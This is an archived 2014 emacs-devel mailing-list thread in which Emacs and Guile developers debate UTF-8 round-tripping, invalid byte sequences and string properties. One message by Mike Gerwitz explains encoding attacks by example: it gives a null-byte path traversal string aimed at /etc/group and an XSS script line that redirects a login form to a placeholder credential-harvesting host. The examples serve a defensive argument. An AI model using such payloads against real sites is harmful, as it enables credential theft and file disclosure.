  2014-10-07 23:11                                                               ` Mark H Weaver
@ 2014-10-08  3:03                                                                 ` David Kastrup
  2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08  3:03 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>> You cannot successfully cater for clueless application programmers.
>
> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

We are not talking about "producing" but "reproducing" here.  It is
clueless to expect manure to magically turn into roses without
instructions.  If you need sanitized output, you need to sanitize your
input at some point of time.  If that point of time is not under your
control, that will cause worse problems than you started with.  You get
denial-of-service attack vectors when raising exceptions, you get
quoting attack vectors when silently removing or replacing characters.
It is much harder to deal with those behaviors reliably than it is to
deal with faithful reproduction, letting you put the cleanup strategies
at the place in processing where they belong.  Like, before any quoting,
and after any unquoting.

And, of course, having the full power of GUILE's string and regexp
processing for dealing programmatically with that cleanup.  There is no
"we don't have to deal with that input anyway" excuse for a programming
platform.

Emacs learnt its MULE lessons the hard way.  And these days, it does not
let its application programmers down.  And since the programmers were
free to put any safety nets at any place _they_ want without risking
gratuitous breakage, Emacs will inform the user of possible coding
problems exactly where the application programmers considered warnings
appropriate, and with exactly the fallbacks and options that the
programmers considered appropriate for that particular use case.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  2:09                                           ` Stephen J. Turnbull
@ 2014-10-08  3:07                                             ` David Kastrup
  2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  1:19                                             ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08  3:07 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  > If you want to convince me that [a property list vector for
>  > implicitly transmitting information across module boundaries] is a
>  > problem,
>
> I'm not trying to convince you; your evidentiary requirements are way
> too high for me to satisfy in time available.

Newsflash: Emacs 19 has been released in the mean time.  That's good
since we have an example we can study now with regard to the problems
text properties may cause.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:47                                                   ` Richard Stallman
@ 2014-10-08  7:13                                                     ` Eli Zaretskii
  2014-10-09  1:19                                                       ` Richard Stallman
  2014-10-09  7:36                                                     ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08  7:13 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Tue, 07 Oct 2014 20:47:04 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     UTF-8 is defined as not containing "overlong" sequences, so Emacs
>     decodes them into two raw-byte indicating characters, one indicating
>     0xC0, one indicating 0xA2.  When encoding, it reassembles them into
>     0xC0 0xA2.
> 
> In that case, it might be reasonable to ask the user whether to accept
> a UTF-8 file decoding that contains any raw-byte characters.
> 
> What do people think of this?

We do ask, but only at buffer save time.  Asking questions when
visiting a file is perceived as a nuisance, because our heuristics
that detect these cases are imperfect and tend to have high enough
false positive rate that annoys people.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:47                                                                     ` Richard Stallman
@ 2014-10-08  7:19                                                                       ` Eli Zaretskii
  2014-10-08  7:37                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08  7:19 UTC (permalink / raw)
  To: rms; +Cc: schwab, dak, emacs-devel

> Date: Tue, 07 Oct 2014 20:47:46 -0400
> From: Richard Stallman <rms@gnu.org>
> Cc: schwab@suse.de, emacs-devel@gnu.org
> 
> We can set the defaults for those non-frile interfaces so as to reject
> invalid UTF-8 sequences.  Then a program could specify to override the
> default and allow them.

That has been tried (not with UTF-8, but I don't think this matters),
and failed miserably.  The experience taught us that Emacs users
definitely don't want Emacs to do _anything_ about the unmodified
parts of text, except copy it verbatim.  Even the question we ask at
buffer-save time is sometimes reported as an annoyance.

Let's not repeat those mistakes.  The current design principle is that
the application or the user need to specifically ask for strict
conformance, if they want it.  For example, if someone was designing a
secure application on top of Emacs, they would need to opt-in such
behavior.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  7:19                                                                       ` Eli Zaretskii
@ 2014-10-08  7:37                                                                         ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-08  7:37 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: schwab, rms, emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Tue, 07 Oct 2014 20:47:46 -0400
>> From: Richard Stallman <rms@gnu.org>
>> Cc: schwab@suse.de, emacs-devel@gnu.org
>> 
>> We can set the defaults for those non-frile interfaces so as to reject
>> invalid UTF-8 sequences.  Then a program could specify to override the
>> default and allow them.
>
> That has been tried (not with UTF-8, but I don't think this matters),
> and failed miserably.  The experience taught us that Emacs users
> definitely don't want Emacs to do _anything_ about the unmodified
> parts of text, except copy it verbatim.  Even the question we ask at
> buffer-save time is sometimes reported as an annoyance.

As one data point, PostScript and PDF files generally constitute of
plain readable text (I seem to remember latin-1 with an option to use
some BOM in strings for getting UTF16 locally but I may be mistaken) but
with inserted binary objects.  At least with PostScript, the file is
linear and one can edit in changes if one wants to.  Obviously, any
unintentional changes in the binary sections are going to stop the
result from working.

This is definitely a case where you want to have better editing
capabilities than a hexdump would give you (as you cannot insert or
delete strings comfortably in a hexdump), but you still want the binary
portions to remain undisturbed as a block.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  3:03                                                                 ` David Kastrup
@ 2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-08 15:11                                                                     ` Eli Zaretskii
  2014-10-08 15:54                                                                     ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-08 15:03 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>> You cannot successfully cater for clueless application programmers.
>>
>> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.
>
> We are not talking about "producing" but "reproducing" here.

I stand by my statement above, regardless of what input is feed into the
UTF-8 encoder, and I think I've said enough to make my point.  You are
immovable, as always, and I don't want to waste any more time on this.

You can add this to your long list of reasons why you consider me a bad
maintainer for Guile.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:03                                                                   ` Mark H Weaver
@ 2014-10-08 15:11                                                                     ` Eli Zaretskii
  2014-10-08 15:54                                                                     ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08 15:11 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, schwab, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Date: Wed, 08 Oct 2014 11:03:51 -0400
> Cc: Richard Stallman <rms@gnu.org>, Andreas Schwab <schwab@suse.de>,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, Eli Zaretskii <eliz@gnu.org>, stephen@xemacs.org
> 
> You are immovable, as always

That was uncalled-for, and actually goes both ways, you know.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-08 15:11                                                                     ` Eli Zaretskii
@ 2014-10-08 15:54                                                                     ` David Kastrup
  2014-10-09  3:26                                                                       ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08 15:54 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Mark H Weaver <mhw@netris.org> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>> You cannot successfully cater for clueless application programmers.
>>>
>>> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.
>>
>> We are not talking about "producing" but "reproducing" here.
>
> I stand by my statement above, regardless of what input is feed into the
> UTF-8 encoder, and I think I've said enough to make my point.  You are
> immovable, as always, and I don't want to waste any more time on this.

Shrug.  It's hard to move me when I have been around in similar
circumstances and when I've been been exposed to the consequences of
similar decisions before.

AUCTeX's prv-xemacs.el contains

(defcustom preview-buffer-recoding-alist
  (if (and (= emacs-major-version 21)
           (< emacs-minor-version 5))
      '((utf-8-unix . raw-text-unix)
        (utf-8-dos . raw-text-dos)
        (utf-8-mac . raw-text-mac)
        (utf-8 . raw-text)))
  "Translate buffer encodings into process encodings.
TeX is sometimes bad dealing with 8bit encodings and rather bad
dealing with multibyte encodings.  So the process encoding output
might need to get temporarily reprocessed into the original byte
stream before the buffer characters can be identified.  XEmacs
21.4 is rather bad at preserving incomplete multibyte characters
in that process.  This variable makes it possible to use a
reconstructable coding system in the run buffer instead.  Specify
an alist of base coding system names here, which you can get
using

  \(coding-system-name (coding-system-base buffer-file-coding-system))

in properly detected buffers."
  :group 'preview-latex
  :type '(repeat (cons symbol symbol)))

(defun preview-buffer-recode-system (base)
  "This is supposed to translate unrepresentable base encodings
 into something that can be used safely for byte streams in the
 run buffer.  XEmacs mule-ucs is so broken that this may be
 needed."
  (or (cdr (assq (coding-system-name base)
                 preview-buffer-recoding-alist))
      base))


as opposed to prv-emacs.el's

(defsubst preview-buffer-recode-system (base)
  "This is supposed to translate unrepresentable base encodings
into something that can be used safely for byte streams in the
run buffer.  A noop for Emacs."
  base)


What you don't see is the associated man-month of bug reports, hassles,
head-scratching, debugging, solution-finding, abstracting and boiling
down into a solution.


I've been at the receiving end of the "reproducing the input bytes
faithfully is not a priority" mindframe, and it is costly.  If I am
immovable here, it's because I'm old.  I've been a programmer long
enough in this game to know that "but when _we_ do that, everything will
be different" pans out rarely enough.

And it's not like I'm not getting bitten at the current point of time
while trying to get LilyPond (and thus C++ strings) play well with
GUILE2 without buying into massive conversion overhead and/or possible
column counting mismatches.

We write out PostScript code.  A mixture of material in Latin1, UTF16BE,
and binary.  We read in utf8 code and have a flex scanner working on
in-memory byte streams it shares with the GUILE reader interpreting it
in UTF-8.

It's not like I don't know what I am talking about here.

> You can add this to your long list of reasons why you consider me a
> bad maintainer for Guile.

To be honest, I was not even aware you were maintainer for GUILE.  There
are several committers to the stable/2.0 branch (and sometimes merging
from there to master), and there is Andy Wingo committing to master in
occasional spurts of commits of highly experimental character that are
not discussed on any public list.  While I am clueless about the
official roles of the various developers, the resulting workflows look
more evolved than designed.  I can hardly blame you for something that
you do not appear to have much choice in.  Many GNU maintainers are
sovereigns without subjects or a castle, mostly endowed with the power
to let the sun rise in the morning.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  2:09                                           ` Stephen J. Turnbull
  2014-10-08  3:07                                             ` David Kastrup
@ 2014-10-09  1:19                                             ` Richard Stallman
  2014-10-09  3:56                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09  1:19 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    I just want to make sure that Emacs developers in general are aware
    that if string properties are added to Guile itself, Emacs will be a
    potential vector for attacks.

If you demonstrate that this claim is valid, I will be concerned.

     For example, by providing a "back
    channel" for malicious information

So what?  How would this affect what anyone can do?  There are many
other channels to communicate data from one part of a Scheme program
to another, so how would this additional channel make a practical
difference?  Why object to adding a window in a wall that has so many
doorways already?

If you show me that there is some real and useful form
of security, which adding string property lists would break,
you could convince me that there is a real issue of security here.

    What I advocate is that string properties should be implemented by
    using Guile facilities for defining types, not by changing Guile.

It would be a pain in the neck if Emacs strings were something
different from Guile strings.  If you want to argue that security
justifies this pain, you need to show it is real security and really
does a useful job.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  7:13                                                     ` Eli Zaretskii
@ 2014-10-09  1:19                                                       ` Richard Stallman
  2014-10-09  7:21                                                         ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09  1:19 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

Regading files:

    We do ask, but only at buffer save time.  Asking questions when
    visiting a file is perceived as a nuisance, because our heuristics
    that detect these cases are imperfect and tend to have high enough
    false positive rate that annoys people.

Asking about invalid UTF-8 in a file could be a nuisance, but how much
of a nuisance depends on the details of what we do.  Since this has
some security implications, it is worth a small amount of nuisance.

What exactly did we try before?

Meanwhile, in a separate message I wrote about non-file operations:

    > We can set the defaults for those non-frile interfaces so as to reject
    > invalid UTF-8 sequences.  Then a program could specify to override the
    > default and allow them.

    That has been tried (not with UTF-8, but I don't think this matters),
    and failed miserably.

I don't think we are talking about the same thing.  I am talking about Lisp
functions to do conversions on text that does NOT come from files.
You seem to be talking about operations on files:

			   The experience taught us that Emacs users
    definitely don't want Emacs to do _anything_ about the unmodified
    parts of text, except copy it verbatim.  Even the question we ask at
    buffer-save time is sometimes reported as an annoyance.

It looks like you're grouping the two cases together,
while I am treating them separately.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  3:07                                             ` David Kastrup
@ 2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  3:44                                                 ` David Kastrup
  2014-10-10 14:23                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:06 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:

 > Newsflash: Emacs 19 has been released in the mean time.  That's good
 > since we have an example we can study now with regard to the problems
 > text properties may cause.

Newsflash: we're not talking about text properties in Emacs, which has
historically been hostile to both embedding in other apps and to FFIs,
and is not normally used as a network daemon, but instead is usually
controlled by the user who owns the resources Emacs manipulates, and
in most cases has little malice toward himself.

We're talking about text properties in Guile, which is designed for
embedding and and extension (including wrapping foreign functions).  A
Guile with text properties hasn't been written, let alone released
AFAIK.  I dunno about the "network daemon" part, but Mark mentioned
that as a target application area for Guile.

It would be "nice" and "efficient" for Guile to implement properties
natively so that Emacs could just use those, but Mark is correct to
worry that those properties would be used to bypass validation modules
written for pre-property Guile versions.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08 15:54                                                                     ` David Kastrup
@ 2014-10-09  3:26                                                                       ` Stephen J. Turnbull
  2014-10-09  4:14                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:26 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > I've been at the receiving end of the "reproducing the input bytes
 > faithfully is not a priority" mindframe, and it is costly.

XEmacs is irrelevant -- it simply doesn't possess the technology.  It
*is* a goal for us, I've tried, and that code is *hairy*, I failed.
So all your examples of pain you've personally suffered are irrelevant.

Nobody here is advocating "not a priority."  Engineering faithful
roundtripping isn't a priority for Emacs only because it's already
possible and robust.  I'm assuming that will continue to be the case
in a Guile-based Emacs.  (If not, sure, that needs to be fixed.
Nobody is saying otherwise, and I've made that explicit several
times.)

So the only question is "what is the default."  Please stop trying to
make this into anything else.

You advocate a default that is convenient for the app programmer, who
saves one project-wide "sed -i -e s/utf-8/utf-8-with-rawbytes/ *" to
achieve the same degree of insecurity and reproducibility his app
would have with the default you prefer.

We advocate a default that is safer for the user, who may lose their
life savings if a filter for 419 phish fails because a character is
encoded with "long" UTF-8, and fails to match the regexp which expects
the character and not rawbytes.  I don't know that there are any Emacs
MUA users who have ever fallen for a phishing message, but I assure
you that I personally have observed "long" UTF-8 in messages that are
otherwise duplicates of correctly encoded spams.  Those bastards don't
miss a trick.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:06                                               ` Stephen J. Turnbull
@ 2014-10-09  3:44                                                 ` David Kastrup
  2014-10-09  7:16                                                   ` Stephen J. Turnbull
  2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  3:44 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Newsflash: Emacs 19 has been released in the mean time.  That's good
>  > since we have an example we can study now with regard to the problems
>  > text properties may cause.
>
> Newsflash: we're not talking about text properties in Emacs, which has
> historically been hostile to both embedding in other apps and to FFIs,
> and is not normally used as a network daemon,

It is used as a network application (I mean, what else to use as news
and mail reader?).  There are currently discussions on the list about
the way to do TLS in a secure manner.

> We're talking about text properties in Guile, which is designed for
> embedding and and extension (including wrapping foreign functions).  A
> Guile with text properties hasn't been written, let alone released
> AFAIK.  I dunno about the "network daemon" part, but Mark mentioned
> that as a target application area for Guile.

Text properties are not in files or network streams.  They will not
magically materialize and cause trouble.

> It would be "nice" and "efficient" for Guile to implement properties
> natively so that Emacs could just use those, but Mark is correct to
> worry that those properties would be used to bypass validation modules
> written for pre-property Guile versions.

Sigh.  At any rate, this is basically a non-issue since GUILE is
perfectly capable of supporting custom extensible string type stacks on
the existing commands like it provides a custom extensible numeric type
stack.  Its object programming system GOOPS has been designed for that
sort of extensibility.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  1:19                                             ` Richard Stallman
@ 2014-10-09  3:56                                               ` Stephen J. Turnbull
  2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-10 14:23                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  3:56 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > If you demonstrate that this claim is valid, I will be concerned.

*sigh*  Be unconcerned.  The world is a *lot* more hostile today than
it was in the days when you posted your passwords on the 'net.

 > It would be a pain in the neck if Emacs strings were something
 > different from Guile strings.

Sure.  Security comes at cost.  That's part of why credit cards charge
a minumum of 5% over prime rate, and why people lose hundreds of
millions of dollars a year to Internet scams: somebody didn't want to
pay that cost, so imposed the risk on others.

The risk is almost invisiblly small in a monolithic Emacs, it's true.
But a Guile-based Emacs is no longer monolithic.  It becomes a
component directly connected to a much larger system of Guile modules,
whose purposes and uses the Emacs developers do not know.  Evidently
some leading Emacs developers are unwilling to care at all about those
unknown purposes and use cases.  If I were a Guile maintainer, I would
be concerned about adding features requested by Emacs.

 > If you want to argue that security justifies this pain,

Sorry, no.  If you want to use a Guile maintained by Mark, you're
going to have to convince him that the benefits of having Guile
implement string properties natively (rather than in the Emacs module
running on top of Guile) is worth overriding his justified paranoia.
I'm trying to convince you and other Emacs developers that you're
going to have to be more sympathetic to security if you want to get
such features into Guile.

 > you need to show it is real security and really does a useful job.

I suspect I can't give you a convincing example, because I haven't
studied the Guile modules "at risk", and in any case, most real risks
would require Guile modules that take advantage of text properties (of
which there are obviously none) or an Emacs -> Guile security code ->
Emacs passage, where the second Emacs instance "trusts" the code
because the Guile security code has validated it, but that's not
possible yet either.

However, here are a couple of analogies.  Even a feature as simple as
".." representing the parent directory has been used in disastrous
network breakins.  The danger of ".." is obvious in retrospect, but
the developers of web servers (several) were taken unaware because
they used system calls to traverse paths, and those calls
authomatically implemented "..".  Sensitive user data (such as
password files) was leaked.

Or how about the recent bash lossage?  s-expressions are just Lisp
data, and could be placed in a property.  Older security code that
does not validate properties might pass arbitrary code (because it
doesn't look at it) to a module that expects to receive a symbol,
eval's it, and voila! you're owned, just as any CGI implemented as a
shell script on a host where /bin/sh is a symlink to bash can own you.
Evaluating functions stored in environment variables is not a POSIX sh
feature; if bash's "sh compatibility" mode actually implemented
compatibility, this exploit would be impossible.  AFAIK setting
POSIX_ME_HARDER doesn't help.

So there you are.  That's the best I can do.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:26                                                                       ` Stephen J. Turnbull
@ 2014-10-09  4:14                                                                         ` David Kastrup
  2014-10-09  7:31                                                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  4:14 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> We advocate a default that is safer for the user,

GUILE is not a user application but a programming language.

> who may lose their life savings if a filter for 419 phish fails

Can we have terrorism with that scaremongering?

> because a character is encoded with "long" UTF-8, and fails to match
> the regexp which expects the character and not rawbytes.

I am glad that Emacs and sed and other utilities don't trash PostScript
files by default in order to save me from phishing.

> I don't know that there are any Emacs MUA users who have ever fallen
> for a phishing message, but I assure you that I personally have
> observed "long" UTF-8 in messages that are otherwise duplicates of
> correctly encoded spams.  Those bastards don't miss a trick.

So?  Does that mean that string operations should throw an error when
encountering $$$$$$$$$$$$$ in a string?  To save the user from scams?

If you keep confusing the responsibilities of platform, application and
user, you arrive at a system you have to work around with constantly
because it knows better than you what you want.

A network application that throws exceptions internally when fed
non-UTF-8 byte combinations is an attack vector for denial-of-service
attacks.  And since the naive programmer does not expect exceptions for
just reading strings, this is a very real danger.  And since GUILE is an
extension language, implicit conversions for C/GUILE call gates are hard
to avoid, and when every call gate is locked towards passing strings
representing arbitrary data, you will not be able to use libraries
without having access to the semantics of every call gate.

At any rate, there is no point to this discussion.  It tends to solve
itself in practice by developers at some point of time becoming tired of
ever the same application programmer level problems getting reported,
and application programmers becoming tired of ever the same developer
attitude regarding internals that refuse to "simply work".

At least I am still allowed to call cons without triggering an error
when the second argument is not a list.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:56                                               ` Stephen J. Turnbull
@ 2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-09  8:00                                                   ` Eli Zaretskii
  2014-10-10 14:23                                                   ` Richard Stallman
  2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mike Gerwitz @ 2014-10-09  4:49 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[-- Attachment #1: Type: text/plain, Size: 3312 bytes --]

On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote:
> Richard Stallman writes:
> 
>  > If you demonstrate that this claim is valid, I will be concerned.
> 
> *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
> it was in the days when you posted your passwords on the 'net.

Agreed. Character encoding attacks are also something that has been
exploited "in the wild". Some examples include:

  - UTF-7 character encoding to bypass filters[0] (e.g. for XSS);
  - IIS WebDAV validation exploit (CVE-2009-1535);[1] and
  - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and
  - Google's XSS vulnerability, related to the first item in this list.[3]

Note that not all of the above may be applicable to the specifics of this
discussion---the point is to convey, generally, that character encoding
poses serious threats when improperly handled. Though this discussion seems
to be about what is "improper".

See "Secure Programming for Linux [sic] and Unix HOWTO".[4]

The Unicode Consortium also has a security report[5] that mentions, among
other import concepts, deletion of code points and handling of "illegal"
input byte sequences.

With regards to passing raw input to other systems: this isn't necessarily
Unicode related (unless an invalid sequence contains a null byte), but
serves to illustrate the point that Mark is trying to make: there is a
well-known issue in PHP whereby passing a null byte as a parameter to a
script (e.g. via HTTP GET/POST) opens up a number of attacks.  Specifically,
PHP handles null bytes in strings (by storing the string length as part of
the struct that holds the string). However, it makes calls directly to libc.
So, if an unvalidated input $foo contains "../../../../etc/group\000", and
PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php",
the result would be opening "/webroot/modules/../../../../etc/group".

I have the most experience developing web applications, where character
encoding exploits are common.[6]

> So there you are.  That's the best I can do.

I can dig up more examples, but hopefully some of these help to illustrate
the severity of ignoring character encoding concerns.

* * *

Aside: For those who don't know what XSS is: the issue is that, if input
from the user is not properly validated/filtered, and is at some point
output back to a user, that output could be interpreted as HTML, JavaScript,
CSS, etc. So if XSS filters are bypassed using the aforementioned methods,
perhaps the user will output `<script>document.forms[0].action =
"http://login-harvester.foo";</script>', which might change a login form,
say, to post user credentials to a remote website.

[0]: http://en.wikipedia.org/wiki/UTF-7#Security
[1]: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535
[2]: https://capec.mitre.org/data/definitions/80.html
[3]: http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
[4]: http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/character-encoding.html
[5]: http://www.unicode.org/reports/tr36/
[6]: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

-- 
Mike Gerwitz
Free Software Hacker | GNU Maintainer
http://mikegerwitz.com
FSF Member #5804 | GPG Key ID: 0x8EE30EAB

[-- Attachment #2: Digital signature --]
[-- Type: application/pgp-signature, Size: 836 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:44                                                 ` David Kastrup
@ 2014-10-09  7:16                                                   ` Stephen J. Turnbull
  2014-10-09  7:47                                                     ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  7:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:
 > "Stephen J. Turnbull" <stephen@xemacs.org> writes:

 > > Newsflash: we're not talking about text properties in Emacs, which has
 > > historically been hostile to both embedding in other apps and to FFIs,
 > > and is not normally used as a network daemon,
 > 
 > It is used as a network application (I mean, what else to use as news
 > and mail reader?).  There are currently discussions on the list about
 > the way to do TLS in a secure manner.

That's simply nonsense as an argument here.  Until you demonstrate at
least a shred of understanding of something as fundamental as the
differences in security requirements and attack surfaces of network
*servers* and network *clients*, there's no point in discussing your
statements further.

 > Text properties are not in files or network streams.  They will not
 > magically materialize and cause trouble.

"Magically", no.  "Maliciously", yes, we do have to worry about that.
Again, your evident ignorance of network threat models and their
historical realizations (both as "theoretical" CVEs and as successful
exploits) is appalling.

 > Sigh.  At any rate, this is basically a non-issue since GUILE is
 > perfectly capable of supporting custom extensible string type stacks on
 > the existing commands

Aha, a convert!  (Yes, I said that already in different terms.)




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  1:19                                                       ` Richard Stallman
@ 2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
                                                                             ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  7:21 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Wed, 08 Oct 2014 21:19:54 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     We do ask, but only at buffer save time.  Asking questions when
>     visiting a file is perceived as a nuisance, because our heuristics
>     that detect these cases are imperfect and tend to have high enough
>     false positive rate that annoys people.
> 
> Asking about invalid UTF-8 in a file could be a nuisance, but how much
> of a nuisance depends on the details of what we do.  Since this has
> some security implications, it is worth a small amount of nuisance.

That wasn't what users felt, overwhelmingly.

> What exactly did we try before?

AFAIR, we tried converting raw bytes into valid non-ASCII characters,
